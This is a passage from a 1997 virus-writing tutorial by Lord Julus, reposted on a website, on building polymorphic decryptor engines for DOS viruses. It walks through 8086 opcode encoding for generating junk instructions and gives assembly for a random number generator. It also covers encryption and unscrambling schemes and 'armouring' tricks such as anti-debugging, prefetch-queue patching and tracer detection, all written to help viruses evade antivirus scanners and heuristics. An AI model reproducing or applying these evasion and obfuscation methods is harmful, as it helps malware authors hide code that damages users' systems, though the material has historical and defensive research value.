You'll get this OpCode: 8B 9C 34 01, or:

10001011100111000011010000000001, which means:

100010 | 1 | 1 | 10 | 011 | 100 | 0011010000000001 |
mov d w r/m reg mod data

lets see: d (direction) = 1, so from 'mod' to 'reg'
w = 1 (the word bit)
r/m = 10 (based with 16-bit displacement)
reg (register)= 011 (BX)
mod = 100 ([SI])
data = 0134h (the 16 bit displ. added to SI)

So, in order to create a 'blank' Mov reg, [si+imm] you should have:

100010 1 1 10 000 100 0000000000000000, or

10001011 10000100 0000000000000000
³³³ ÀÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÄÄ-> here you put your data
³³³
³³ÀÄÄÄÄ-\
³ÀÄÄÄÄÄÄ-> here you put your register
ÀÄÄÄÄÄÄÄ/

So what do you think this would be:

10001001100011011000000000000000 ?

It would be MOV [DI+1000h], CX because:

d = 1
r/m = 10
mod = 101
reg = 001

Now let's take all the instructions and look at each and everyone and
see how are they encoded. One more thing: I stated at the beginning that
I'll consider the AX the junk register because some instructions are
optimized for it. As you'll se below, being given a skeleton for an
instruction you can make it use any register. You can also make it use the
AX, even if a compiler wouldn't generate something like that. Hope you get
this...

For the first instruction (MOV) I will indicate how you can calculate
the length of the instruction in bytes. For the rest figure it out, it's
easy !

a) The MOV instruction
~~~~~~~~~~~~~~~~~~~~~~
1) mov reg, imm

1011, w, reg, imm
- if w = 0 imm is 8 bit -> 2 byte instr.
- if w = 1 imm is 16 bit -> 3 byte instr.

2) mov reg, reg
mov reg, mem
mov mem, reg

100010, d, w, r/m, reg, mod, data
- if r/m = 00 -> 2 byte instr.
- if r/m = 01 data is 8 bit -> 3 byte instr.
- if r/m = 10 data is 16 bit -> 4 byte instr.

3) mov sreg, reg
mov reg, sreg

100011, d, 0, 1, sreg, reg, 1
- 2 byte instruction

b) The XCHG instruction
~~~~~~~~~~~~~~~~~~~~~~~
xchg reg, reg
xchg reg, mem
xchg mem, reg

100001, w, r/m, reg, mod, data

c) The stack operations
~~~~~~~~~~~~~~~~~~~~~~~
PUSH reg - 01010, reg
POP reg - 01011, reg
PUSH sreg - 000, sreg, 10
POP sreg - 000, sreg, 11
PUSH imm - 01101000, data
PUSH mem - 11111111, r/m, 110, mod, data
POP mem - 1000111, r/m, 0000, mod, data
PUSHA - 01100000
POPA - 01100001
PUSHF - 10011100
POPF - 10011101

d) The logical instructions
~~~~~~~~~~~~~~~~~~~~~~~~~~~
1) XOR
~~~~~~
1.1) XOR reg, reg

001100, d, w, 11, reg1, reg2

with the mention that d = 1 only if reg1 = reg2

1.2) XOR reg, imm

100000, w, r, 11110, reg, data

with the mention that if r = 0 register is 8 bit otherwise
register is 16 bit

1.3) XOR reg, mem
XOR mem, reg

00110, d, w, r/m, reg, mod, data

2) OR
~~~~~
1.1) OR reg, reg

0000100, d, w, 11, reg1, reg2

1.2) OR reg, imm

100000, w, r, 11001, reg

1.3) OR reg, mem
OR mem, reg

000010, d, w, r/m, reg, mod, data

3) AND
~~~~~~
1.1) AND reg, reg

001000, d, w, 11, reg1, reg2

1.2) AND reg, imm

100000, w, r, 11000, reg

1.3) AND reg, mem
AND mem, reg

001000, d, w, r/m, reg, mod, data

4) NOT
~~~~~~
1.1) NOT reg

1111011111010, reg

1.2) NOT mem

1111011, w, r/m, 010, mod

5) NEG
~~~~~~
1.1) NEG reg

1111011111011, reg

1.2) NEG mem

1111011, w, r/m, 011, mod

6) TEST
~~~~~~~
1.1) TEST reg, reg

1000010, w, 11, reg1, reg2

1.2) TEST reg, imm

1111011, w, 11010, reg, data


6) CMP
~~~~~~
1.1) CMP reg, reg

0011101, d, w, 11, reg1, reg2

1.2) CMP reg, imm

100000, w, r, 11111, reg

1.3) CMP reg, mem
CMP mem, reg

001110, d, w, r/m, reg, mod, data


e) The Arithmetic instructions
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1) ADD
~~~~~~
1.1) ADD reg, reg

0000001, w, 11, reg, reg

1.2) ADD reg, imm

100000, w, r, 11000, reg

1.3) ADD reg, mem
ADD mem, reg

000000, d, w, r/m, reg, mod

2) ADC
~~~~~~
1.1) ADC reg, reg

0001001, w, 11, reg, reg

1.2) ADC reg, imm

100000, w, r, 11010, reg

1.3) ADC reg, mem
ADC mem, reg

000100, d, w, r/m, reg, mod

3) SUB
~~~~~~
1.1) SUB reg, reg

0010101, w, 11, reg, reg

1.2) SUB reg, imm

100000, w, r, 11101, reg

1.3) SUB reg, mem
SUB mem, reg

001010, d, w, r/m, reg, mod

4) SBB
~~~~~~
1.1) SBB reg, reg

0001101, w, 11, reg, reg

1.2) SBB reg, imm

100000, w, r, 11011, reg

1.3) SUB reg, mem
SUB mem, reg

000110, d, w, r/m, reg, mod

3) INC
~~~~~~
01000, reg16
1111111111000, reg8


4) DEC
~~~~~~
01001, reg16
1111111011001, reg8

f) Shifting instructions
~~~~~~~~~~~~~~~~~~~~~~~~
1) SHR
~~~~~~
1.1) SHR reg, 1

1101000, w, 11101, reg

1.2) SHR reg, imm

1100000, w, 11101, reg

1.3) SHR reg, cl

1101001, w, 11101, reg

2) SHL
~~~~~~
1.1) SHL reg, 1

1101000, w, 11100, reg

1.2) SHL reg, imm

1100000, w, 11100, reg

1.3) SHL reg, cl

1101001, w, 11100, reg

3) ROR
~~~~~~
1.1) ROR reg, 1

1101000, w, 11001, reg

1.2) ROR reg, imm

1100000, w, 11001, reg

1.3) ROR reg, cl

1101001, w, 11001, reg

4) ROL
~~~~~~
1.1) ROL reg, 1

1101000, w, 11000, reg

1.2) ROL reg, imm

1100000, w, 11000, reg

1.3) ROL reg, cl

1101001, w, 11000, reg

5) RCL
~~~~~~
1.1) RCL reg, 1

1101000, w, 11010, reg

1.2) RCL reg, imm

1100000, w, 11010, reg

1.3) RCL reg, cl

1101001, w, 11010, reg

6) RCR
~~~~~~
1.1) RCR reg, 1

1101000, w, 11011, reg

1.2) RCR reg, imm

1100000, w, 11011, reg

1.3) RCR reg, cl

1101001, w, 11011, reg


g) Flag instructions
~~~~~~~~~~~~~~~~~~~~
CLI - 11111010
STI - 11111011
CLD - 11111100
STD - 11111101
CLC - 11111000
STC - 11111001
CMC - 11110101
SAHF - 10011110
LAHF - 10011111

h) Jump instructions
~~~~~~~~~~~~~~~~~~~~
1) JMP SHORT - EBh, data8

2) JMP NEAR - E9h, data16

3) JMP FAR - EAh, data

data is a segment:offset data in inverse format.
Example: jmp far 1000:432fh = EAh, 2f43h, 0010h

Now, the conditional jumps (note that data8 is a 8 bit signed number;
if it's from -127 to -1 the jump is upward otherwise the jump is
downward. The jump is counted from the *END* of the jump instruction.
This means that a JE 00 is a jump to the next instruction below. A
JE 02 is a jump past the two bytes *AFTER* the jump's OpCodes)

4) JBE/JNA - 76h, data8
5) JLE/JNG - 7Eh, data8
6) JB/JNAE/JC - 72h, data8
7) JL/JNGE - 7Ch, data8
8) JZ/JE - 74h, data8
9) JNE/JNZ - 75h, data8
10) JAE/JNB/JNC - 73h, data8
11) JGE/JNL - 7Dh, data8
12) JA/JNBE - 77h, data8
13) JG/JNLE - 7Fh, data8
14) JCXZ - E3h, data8
15) JNO - 71h, data8
16) JO - 70h, data8
17) JP/JPE - 7Ah, data8
18) JNP/JPO - 7Bh, data8
19) JNS - 79h, data8
20) JS - 78h, data8

21) LOOP - E2h, data8

22) CALL SHORT - E8h, data8

23) RETN - C3h
24) RETF - CBh
35) IRET - CFh

36) INT - CD, data8

i) Other misc. instructions
~~~~~~~~~~~~~~~~~~~~~~~~~~~
1) lea reg, mem

10011, d, w, r/m, reg, mod, data

For example LEA DI, [BP+1000h] would be:

10011, 0, 1, 10, 111, 110, 0010
Opcode d w r/m reg mod data


After all these have been said, you are now able to create skeletons
for each instruction and then fill it with the proper registers and mod's
and everything.

Let's say the following:

kreg = CX = 00000001
creg = BX = 00000011

and we want to create:

(1) XOR CX, BX
(2) MOV [DI], CX

For (1) we have the skeleton:

001100, d, w, 11, reg1, reg2
which we encode like:

00110000 11000000, and then we start to fill it:

00110000 or 11000000 or
00000011 00001011
-------- --------
00110011 11001011 and we have 0011001111001011 = 33CBh

For (2) we have the skeleton:

100010, d, w, r/m, reg, mod, data
which we encode like:

10001000 00000000, and then start to fill:

10001000 or 00000000 or
00000001 00001101
-------- --------
10001001 00001101 = 1000100100001101 = 890Dh

So, we have:

33 CB xor cx, bx
89 0D mov [di], cx

And a final word about all this stuff of coding here. I'm talking
about segment overrides. Sometimes you may want to override the memory
address with another register. This is done by inserting *before* the
entire Opcode the segment override. For example if you want to turn
MOV [DI], CX into MOV ES:[DI], CX the opcode will turn from 890Dh to 26890Dh.
You may put how many overrides you want, but only the last one will take
effect. You can use this to turn 2 byte junk instructions into three byte
junk instructions, and so on.


ÚÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ The Steps ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

Ok, now that we know most of the things about how a polymorphic
decryptor should look like, let's get deeper.

1) How to store so much information ?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The answer is: Compress and Code everything. I already started this,
by giving a number to each of our instructions in the main decryptor. We
already created a matrix that will hold the order our instructions will be
generated. We *know* which is the length of each instruction. We define it
in an array. Then we need to start coding. There are not so many instructions
given in all the methods we computed up there. All we have to do is give a
number to each of them as soon as we meet one. Like, for example:

[1] mov lreg, length

a) push imm - 01h
pop reg - 02h
b) mov ax, imm - 03h
mov reg, ax - 04h
c) xor reg, reg - 05h
xor reg, imm - 06h
d) mov reg, 0 - 03h
add reg, imm - 07h
e) mov reg, imm - 03h

So we can code the entire [1] instruction with all it's variants like this:

01 FF 05 FF 01 02 FD FD FF 03 04 FD FF 05 06 FD FF 03 07 FF 03 FD FD FD FD FE

where:
þ the first 01 is the instruction number
þ the first 05 gives the number of variants
þ FF is a mark between variants
þ FE is the mark of end of all
þ FD marks a junk instruction

As I said, you may insert the junks between the real code randomly.
This means you can permute the FD's between the FF's and get another code
that does the same thing.

So, the entire poly-main-decryptor will look like this:

decryptor_table:
db 01h, FFh, 05h, ...
db 02h, FFh, ...
...
db 15h, FFh, ...

This cleared up how you store the instructions. You create them
steb by step. Let's say you picked combination nr. 3 of the first
instruction. You generate it. Then you generate random junk. Then you
go onto the next instruction, and so on... Of course, before going into
this you must compute the random key, keyi, startcode and length and
associate for each a random number to junk them around like:

if length = 1000h get a random, let's say 1234h and store it like:

length = 1000h xor 1234h = 234h

When you want to use the real length, just XOR again.

But still, how do you code and get all that big amount of instructions
with different sizes and everything ? Again: compress and code. Here is an
idea:

instruction_table:

aa bb c d e iiiiiiiiiiiiiiiiiiiiii
³ ³ ³ ³ ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> = instruction skeleton
³ ³ ³ ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> 1 = can be used as junk
³ ³ ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> 1 = but only with jreg
³ ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> 1 = can use other regs if imm=0
³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> = instruction length in bytes
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> = instruction number

The bb can be for example a three bit nr. and hold something like this:

000 - instr. is always 2 bytes long
001 - instr. is 2 bytes long if r/m = 00
010 - instr. is 3 bytes long if w = 0
100 - instr. is 4 bytes long if w = 1

or something like this. Here each one of you must use your imagination
with only one purpose: Optimization ! The stored data must be as compressed
as possible and as easy to access as possible.

You should have a place with, let's say, 12 bytes, filed with 0, where
you should transfer the instruction you want to create and OR it with the
proper values there and then transfer it. This offers speed because you
always know the source of instruction.

Actually, let's look directly into the code of M.O.F. and see how
it stores it's data:

db 2, 01101000b, 00000000b ;01 PUSH imm
db 1, 01011000b ;02 POP reg

<snip here>

db 2, 75h, 0h ;27 JNE
db 1, C3h ;28 RET

As you can see, the instructions are stored without any r/m, mod, or
reg field filled. In order to fill up the instructions we have a so called
'filling table' which looks like this:

n ? d r/m mod data16 reg1 reg2

n ! ? x xx xxx xxxxxxxxxxxxxxxx AA BB
³ ³ ³ ³ ³ ³ ³ ³ ³
³ ³ ³ ³ ³ ³ ³ ³ ÀÄÄ second register
³ ³ ³ ³ ³ ³ ³ ÀÄÄÄÄÄ first register
³ ³ ³ ³ ³ ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ data16 (0 if not necessary) (twice)
³ ³ ³ ³ ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ mod for r/m <> 11
³ ³ ³ ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ r/m for this instr
³ ³ ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ the direction
³ ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ instruction type
³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ segment override
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ instruction number

Register codification:

0000 - lreg
0001 - creg
0010 - kreg
0011 - jreg
0100 - preg
0101 - jrpg
0111 - sreg
1000 - dreg
1111 - none

? values: - 001 - a register/register instr.
- 010 - a register/immediate instr.
- 011 - a register/mem instr.
- 100 - a one register instr.
- 101 - a immediate only instr.
- 111 - a memory only instr.

! values: - 00 - none
- 01 - sreg
- 10 - dreg
- 11 - instruction is special and nothing furthure should be
considered

if mod = 111 then it's actualy - 100 if preg = SI or
- 101 if preg = DI.

So, let's take the first instruction in our code:

[1] mov lreg, length:

- !=00 - no segment override
- ?=010 - a register to immediate instr. type
- d=0 - normal direction
- r/m=00 - based
- mod=000 - no index
- data16_1 = length xor rndm
- data16_2 = rndm
- reg1=0000 - first register used is lreg
- reg2=1111 - no second register

In the first combination for the first instruction we have:

push imm 01
pop reg 02
xor reg,rndm 03

As you can see there are 2 immediate values used. M.O.F handles this
in this way (downwards). The first push is done with the first data16. The
pop reg is done with the lreg and because data16_2 is not 0, the xor is
done with the second data16. If data16_2 were 0 then only the first data
was used. Hope you get it.


2) How do I get the randoms ?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
I promised I'll get back to this. Here bellow is a routine that gives
you a random number between 0 and n-1. All you have to do is:

mov cx, n
Call random

and the routine returns the random in AX.

If you want a random between 0 - FFFFh just do mov cx, 0.

But first of all, in order to have a really random number you should
initialize the random number generator by doing a CALL RANDOMIZE.
Warning: The routine assumes you have your Delta handler set, otherwise
make BP = 0 !!

Random nr. generator
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
rand_seed Dw 0
RANDOMIZE: ;procedure to start the
Push AX CX DX ;random generator
Xor AH,AH ;get timer count
Int 1Ah
Mov CS:[BP + rand_seed],DX ;and save it
Xchg CH,CL
Add CS:[BP + rand_seed_2],CX
Pop DX CX AX
Ret
;--------------------------------------------------------------------------
RANDOM: ; the random number generator
In AL,40h ; timer, for random nr
Sub AX,CS:[BP + rand_seed]
Db 35h ; XOR AX,
rand_seed_2 Dw 0 ; what is here
Inc AX
Add CS:[BP + rand_seed],AX ; change seed
cmp cx, 0
je _out
Call Modulo
_out:
Ret
;--------------------------------------------------------------------------
MODULO: ; the modulo procedure ax = ax mod cx
Push DX
Xor DX, DX
Div CX
Xchg AX, DX
Pop DX
Ret
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


3) What parameters my routine must receive and what should it return ?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
I suggest that the virus should move itself the code to an empty
buffer, passing to the routine a pointer to that location and a length
of code to be encrypted. The pointer must be at the beginning of the code
to be encrypted not the beginning of all code !!

So the routine should receive something like:

DS:SI - pointer to code to be encrypted
CX - length of code.

Warning: The buffer at DS:SI must be big enough to hold the CX bytes
of code *and* the decryptor.
After the engine generated the decryptor it should return the length
of the encrypted code + the length of the decryptor.


4) Is this all ?!? Is my code completely mutant ?!?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Nope...
Remember the entry point of the virus ? That place where you get the
Delta Handler and then Call the decryptor ? Well, that area should be done
in two ways:
a) made polimorphic as well
b) made very small so it doesn't flag AV's

Otherwise, you've done nothing... Your decryptor is perfect, but the
virus is cought by the first bytes... Handle with it... It's not hard.


ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ The unscrambling procedure ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

Ok, so you wonder what is that 'CALL unscramble' I put there in the
decryptor. I could as well say <unscrambling operation>. There actually
the code held by the 'creg' register is modified using a math operation
involving the second member, the key holder, e.g. the 'kreg' register.

In old routines the encryption was made using these ways:

Encrypt ³ Decrypt
ÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄ
XOR ³ XOR
ROR ³ ROL
ADD ³ SUB
AND ³ OR (here with some playing around)
ÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄ

But more advanced procedures use many ways. For example, my own poly
routine (LJ_MOF - Multiple Opcode Fantasy) uses a very trivial way to
encrypt the code. It uses 4 methods and in each case the methods are put
in a random order. Then the words are encrypted each with another method,
in the given order. After each iteration the order shifts and the key is
increased. Therefore, we cannot decrypt the code by a simple math operation.

If your virus is a small one you may consider a DIV/MUL procedure,
but this is very slow. But if your virus is small you

  
may consider an
AND/OR scrambling procedure. This is done like this:

c = code to be encrypted
k = encryption key
k' = NOT k

E1 = c AND k
E2 = c AND k'

In your code you store E1 and E2 (there by obtaining an encrypted
length = original length * 2). To restore the code simply do:

c = E1 or E2.

Check it:

1000 and 2222 = 168
NOT 2222 = -2223
1000 and -2223 = 832
----------------------
168 or 832 = 1000

So, the thing is you should have a separate unscrambling procedure.
Therefore, here is how I see the polymorphic decryptor that a good engine
should create:


ÚÄÄÄÄÄÄÄÄÄÄ Host ÄÄÄÄÄÄÄÄÄÄÄ¿
³ ³
 ³
Entry ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³
³ Delta getter ³ ³
³ ³ ³
ÚÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´<Ä¿ ³
³ ³ ³ ³ ³
³ ³ virus body ³ ³ ³
³ ³ ³ ³ ³
³ ³ (poly engine) ³ ³ ³
³ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄijÄÙ Ä¿
³ ³ ³ ³ ³
³ ³ unscrambling routine ³ ³ ³
ÀÄ>ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ³ ÃÄ All this part here must be
³ ARMOUR ³ ³ ³ generated by the polymorphic
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ³ ³ engine.
³ decryptor ³ ³ ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÁÄÄÙ ÄÙ

So, the host calls the virus which calls the polymorphic decryptor.
First it encounters the ARMOUR routine, then it goes into the decryptor loop
which uses the Unscrambling Routine. After that the control is passed back
to the virus.

But, as we know how to create a polymorphic decryptor, creating
a polymorphic unscrambling routine is a piece of cake now. All you must
have in mind is to generate something able to make the inverse of the math
operation you performed. For the beginners I suggest instead of a CALL to
an unscrambling routine to use a simple XOR creg, kreg and then go further
with more complicated routines.


ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Armouring your routines ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

Ok, so you made a decryptor, completely polymorphic, not one byte
there is the same in different generations and still some AV's report that
this could be a virus... With the kind of decryptor I gave above, like MOF
is, generating almost 2000 bytes decryptors the possibility is very small.
And still we should use some techniques.

Your decryptor should have in the beginning what I mentioned in the
scheme: The ARMOUR. I will not get too deep into this, first because I
didn't studied it enough and second of all because there are many articles
out there about this.

From the beginning I will say that in these days you *should* work
in 386 instructions (maybe even 486). This will mess up many AV's and in
extra, imagine the possibilities: you have eight 8 bit regs, eight 16 bit
regs and eight 32 bit registers, plus some new segment registers ! New
polymorphic ways !

Second of all, armour your calls to the decryptor. This could be done
easily by removing a CALL decryptor instruction with something not so
obvious, like this:

mov ax, 0b00h ; get keyboard status
int 21h ; this returns al with FFh or 0h
dec al ; if we decrement al we'll have a
jns not_good ; signed number
jmp decryptor ; which will lead us to our decryptor.
not_good:

Again, don't let the decryptor finish the code. This is followed by
many AV's. If you can't make a poly engine, at least put some junk after
your last RET.

Anyway, in the polymorphic ARMOUR routine (which mustn't be too
obvious) you should do some of these:

a) Overflow the stack, like:

þ mov ax, sp
mov sp, 0
pop bx
mov sp, ax

or simply mess with it, like:

þ Not SP
Not SP or

þ Neg SP
Neg SP

b) Use the Prefetching Queue. Very good technique:

Example 1:

mov cs:[patch], 04CB4H
patch: Jmp over ; this will turn into Mov ah, 4ch
Int 21h
over: ...


Example 2:

mov cs:[patch], 0F7EBh
patch: Nop ; this will become JMP $-7 and will be
Nop ; an infinite jump
...
mov cs:[patch], 0000h

You have to understand: normaly, the instruction at the `patch' address
will be executed by the processor as a result of the Prefetching Queue. But
if debugged or traced, the code will change. In the first example a
'Terminate' will occure, in the second example an infinite jump will appear.
The good thing is that you can put a ';' before the mov cs:... instruction
in order to easily debug your programs.

c) Make very long loops doing a very simple operation (like copying
code from a source that's the same with it's destination), and
make these loops long:

mov ds, ax
mov es, ax
mov di, si
mov cx, 0FEFEh
loop1:
movsb
loop loop1

d) Make calls to Interupts that do nothing, or make calls to interupts
that return known values.

e) Try to modify the address of INT 01, or INT 03. Then check the int
table and see if they changed. If not -> go into an infinite loop,
someone is tracing your code.

f) Hook some interrupts (like 15 or 19) and in the handler block the
keyboard (for example by copying the vector for INT 1ch into the
INY 09h place)

g) Check the PSP:0000 and if it's not CD20h or if the PSP is it's own
parent, hook the computer.

h) Get known values, like CDh at PSP:0000 and use it by adding or
substracting in order to obtain what you want.

j) A very good techinque is the 'wrap around 0' technique. In order to
use this you must know that when a register is increased above 0FFFFh it
goes around 0 like this:

0FFFEh + 3h = 1h

Let's take two numbers. One is called 'base number' (B) and the other
'increment' (I) with the propriety:

K = B + I,
B + I > 0FFFFh

For example, we consider that K is the pointer to our code to decrypt.
An usual way to get a byte from that position would be like this:

mov di, K
...
mov ax, word ptr cs:[di]

But with the numbers B and I we can change our code to this:

mov di, B
...
mov ax, word ptr cs:[di + I]

B + I will wrap around 0 and will give the original K. This
makes things very bad for the heuristic analysers who search for the places
the usual pointer registers hold.
Note that numbers wrap around 0 also when they are decreased:

0h - 1h = 0FFFFh

So you can also use at your choice something like [di - I]
Of course, the B and I numbers will always be choosed randomly.

k) Beware when using not very used instruction that may flag some AV's.
Like for example AAA, AAS, DAS and so on. Just don't include these in your
junk instruction table.

Ok, I'll stop here, because we are not going to make this article an
anti-debugging one. Armour your poly-decryptor how you can and let the real
code do the real tricks.


ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Advanced polymorphism ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

OK, now after we have `mastered' the basics of polymorphism, if I can
say so, let's take a look at ways to render the basic poly engine to what
should be the perfect engine. In order to obtain this, we must add to the
requirements of a perfect poly engine one more thing:

þ the decryptor should be able to place itself wherever into the
code.

Look a little at how I see the process of 'new code procreation':

This is how our virus resides in memory:

ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ ÚÄÄÄÄÄÄÄÄ¿ ÚÄÄÄÄÄÄÄÄ¿ ³
³ ³ Virus ³ ³ Empty ³ ³
³ ³ body ³ ³ space ³ ³
³ ³ ³ ³ ³ ³
³ ³ in ³ ³ in ³ ³
³ ³ memory ³ ³ memory ³ ³
³ ÀÄÄÄÄÄÄÄÄÙ ÃÄÄÄÄÄÄÄÄ´ ³ ÄÄ¿
³ ³ free ³ ³ ³__ This extra space is needed for the
³ ³ space ³ ³ ³ decryptor
³ ÀÄÄÄÄÄÄÄÄÙ ³ ÄÄÙ
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

The poly engine will make a copy of the Virus body over the empty space:

ÚÄÄÄÄÄÄÄÄÄ¿ ÚÄÄÄÄÄÄÄÄÄ¿ ÚÄÄÄÄÄÄÄÄÄ¿
³ Copy of ³ ³#########³ ³#########³ Ä Part 1
³ virus ³ Step 1 ³#########³ Step 2 ÃÄÄÄÄÄÄÄÄÄ´
³ body ³ ÄÄÄÄÄÄÄÄÄÄÄ> ³#########³ ÄÄÄÄÄÄÄÄÄÄÄ> ³ free ³
³ ³ ³#########³ ³ space ³
³ ³ ³#########³ ÃÄÄÄÄÄÄÄÄÄ´
ÃÄÄÄÄÄÄÄÄÄ´ ÃÄÄÄÄÄÄÄÄÄ´ ³#########³
³ free ³ ³ free ³ ³#########³ Ä Part 2
³ space ³ ³ space ³ ³#########³
ÀÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÙ

Where '#' represents the code already encrypted using a given method.
In step 2, we move the free space somewhere random into the encrypted code.
Actually, we break the encrypted code in two parts: the upper part and the
lower part. So, we will have some suplimentar values that we should consider:

Start1 = start of first part of code
End1 = end of first part of code
End2 = end of second part of code

We don't need more: the free space start is at End1+1 and the second
part start is at End1+FreeSpace+1.
After this in the free space the engine will create the decryptor.
It must be able to decrypt both parts (at your choice you can encrypt them
using different methods) and then give control to a place well known
(usualy at the beginning of code). Here we must get rid of the decryptor !
So, after the 'Going Resident part' acted, the memory will look like this:

ÚÄÄÄÄÄÄÄÄÄ¿ ÚÄÄÄÄÄÄÄÄÄ¿
³+++++++++³ ³+++++++++³ '+' represents de decrypted code.
ÃÄÄÄÄÄÄÄÄÄ´ ³+++++++++³ We got rid of the decryptor by
³ DecrypÄ ³ ³+++++++++³ moving upwards the entire Part 2
³ tor ³ ÄÄÄÄÄÄÄÄÄ> ³+++++++++³ and make it overwrite the
ÃÄÄÄÄÄÄÄÄÄ´ ÀÄÄÄÄÄÄÄÄÄÙ Decryptor.
³+++++++++³
³+++++++++³
³+++++++++³
ÀÄÄÄÄÄÄÄÄÄÙ

So, the decryptor worked ! It unscrambled the code, and gave it the
control. The code went resident and rejoined his two parts becoming exactly
like the original code existed.

The main advantage of this thing is that the Call to the decryptor is
variable. It is now almost impossible for the heuristic cleaners to locate
the place of the virus and remove it, by searching for the original header
after emulating the decryptor, especialy if you use some armouring
techniques along with that.

Here are some other ideas you may use to increase the polymorphism
level of your engine:

þ play with the direction (encryption/decryption to go upwards or
downwards)
þ play with the word/byte level encryption type
þ after the polymorphic decryptor worked make it give control to
another decryptor (this time a really sofisticated one. For more
on that check out the `Decryptors' article which I will release
soon which will include CoProcessor related decryptors)


ÚÄÄÄÄÄÄÄÄÄÄÄ¿
³ Closing ³
ÀÄÄÄÄÄÄÄÄÄÄÄÙ

Since the early days of programming, when I was trying to create
self-checking executables or to include in games' executables lines like:
'This game comes from me!', I was intrigued by the internal looks of the
code. I knew that you can do this kind of things only by looking at the bit
level of the instructions. When I heard about viruses I was curious too.
When I heard about the polymorphic routines and after I studied a couple
of them I became really interested about this. I don't know if this
document helps you in any way, but I would appreciate any feed-back and any
ideas in this direction. Thanx.

Many thanx go to: The Black Baron, Dark Avenger, Rock Steady, Dark Angel,
Qark, Quantum, Hellraiser, Executioner


ÚÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
³ Lord Julus - 1997 º
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT